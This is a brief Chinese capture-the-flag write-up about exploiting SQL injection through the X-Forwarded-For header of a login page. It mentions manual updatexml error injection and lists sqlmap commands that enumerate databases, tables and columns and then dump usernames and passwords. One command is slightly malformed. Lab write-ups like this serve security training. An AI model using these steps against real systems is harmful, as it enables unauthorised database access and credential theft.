PS:这里也可以BP修改X-Forwarded-For参数, 手工报错注入updatexml函数 一步一步爆出数据,得到数据。我这里使用的sqlmap
1.打开后发现是登录界面,题目提示X-Forwarded-For,抓包:
在网站登陆处抓包,发现提示IP已被记录修改X-Forwarded-For发现ip改变,说明X-Forwarded-For字段的内容可控,且很有可能保存在数据库当中
2.将数据包保存为TXT文件(我这里保存名字为xff.txt),并将X-Forwarded-For字段内容置为*,提示sqlmap该处存在sql注入漏洞。
使用sqlmap执行以下命令(这里我懒得再跑了,可能是我电脑不行,跑的有点久)
这里是我之前爬下来的数据:
python sqlmap.py -r xff.txt
读取数据库:python sqlmap.py -r xff.txt -dbs -v 3
获取表名:python sqlmap.py -r xff.txt -D webcalendar --tables
获取列名:python sqlmap.py -r xff.txt -D webcalendar -T user columns
获取数据:python sqlmap.py -r xff.txt -D webcalendar -T user -C"id,password,username" -dump